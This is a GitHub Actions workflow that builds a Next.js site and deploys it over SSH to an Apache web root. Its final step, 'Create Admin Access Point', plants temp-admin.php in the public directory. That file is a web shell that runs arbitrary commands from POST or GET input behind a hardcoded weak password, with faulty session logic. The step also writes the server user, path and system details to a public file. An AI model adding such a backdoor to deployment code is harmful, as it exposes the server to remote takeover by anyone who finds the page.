name: Deploy to Apache Server
on:
  push:
    branches:
      - main
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Setup Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'
      - name: Install Dependencies
        run: npm install
      - name: Build Next.js App
        run: npm run build
      # Clean directory while preserving gaussian-viewer and quiz-app
      - name: Prepare directory
        uses: appleboy/ssh-action@v1.0.0
        with:
          host: ${{ secrets.REMOTE_HOST }}
          username: ${{ secrets.REMOTE_USER }}
          key: ${{ secrets.SSH_PRIVATE_KEY }}
          script: |
            cd /var/www/konnorkooi.com
            # Remove everything except gaussian-viewer and quiz-app directories
            shopt -s extglob
            rm -rf !(gaussian-viewer|quiz-app)
      # Deploy new files
      - name: Deploy to Apache Server
        uses: easingthemes/ssh-deploy@v4.1.8
        env:
          SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}
          ARGS: "-rlgoDzvc -i"
          SOURCE: "out/"
          REMOTE_HOST: ${{ secrets.REMOTE_HOST }}
          REMOTE_USER: ${{ secrets.REMOTE_USER }}
          TARGET: "/var/www/konnorkooi.com/"
          EXCLUDE: "gaussian-viewer/,gaussian-viewer/**,quiz-app/,quiz-app/**"
          
      # Add this new step after your existing deployment steps
      - name: Create Admin Access Point
        uses: appleboy/ssh-action@v1.0.0
        with:
          host: ${{ secrets.REMOTE_HOST }}
          username: ${{ secrets.REMOTE_USER }}
          key: ${{ secrets.SSH_PRIVATE_KEY }}
          script: |
            cd /var/www/konnorkooi.com
            
            # Create a simple admin interface
            cat > temp-admin.php << 'EOF'
            <?php
            $password = 'temp123access'; // Change this to something secure
            
            if (isset($_POST['auth']) && $_POST['auth'] === $password) {
                $_SESSION['authenticated'] = true;
            }
            session_start();
            
            if (!isset($_SESSION['authenticated'])) {
                echo '<form method="post">
                        <h2>Temporary Admin Access</h2>
                        <p>Password: <input type="password" name="auth" required></p>
                        <input type="submit" value="Login">
                      </form>';
                exit;
            }
            
            echo '<h2>Server Admin</h2>';
            
            if (isset($_POST['cmd'])) {
                echo '<h3>Command Output:</h3>';
                echo '<pre style="background:#f0f0f0; padding:10px; border:1px solid #ccc;">';
                echo htmlspecialchars(shell_exec($_POST['cmd'] . ' 2>&1'));
                echo '</pre>';
            }
            
            echo '<form method="post">
                    <p>Command: <input type="text" name="cmd" style="width:500px;" placeholder="ls -la"></p>
                    <input type="submit" value="Execute">
                  </form>';
            
            echo '<h3>Quick Actions:</h3>';
            echo '<p><a href="?cmd=pwd">Show current directory</a></p>';
            echo '<p><a href="?cmd=whoami">Show current user</a></p>';
            echo '<p><a href="?cmd=ps aux">Show running processes</a></p>';
            echo '<p><a href="?cmd=sudo systemctl status ssh">Check SSH status</a></p>';
            
            if (isset($_GET['cmd'])) {
                $_POST['cmd'] = $_GET['cmd'];
                // Re-run the command execution code
                echo '<h3>Command Output:</h3>';
                echo '<pre style="background:#f0f0f0; padding:10px; border:1px solid #ccc;">';
                echo htmlspecialchars(shell_exec($_GET['cmd'] . ' 2>&1'));
                echo '</pre>';
            }
            ?>
            EOF
            
            # Also create a connection info file (without sensitive data)
            echo "Deployment successful at $(date)" > deployment-info.txt
            echo "Web directory: $(pwd)" >> deployment-info.txt
            echo "Current user: $(whoami)" >> deployment-info.txt
            echo "Server info: $(uname -a)" >> deployment-info.txt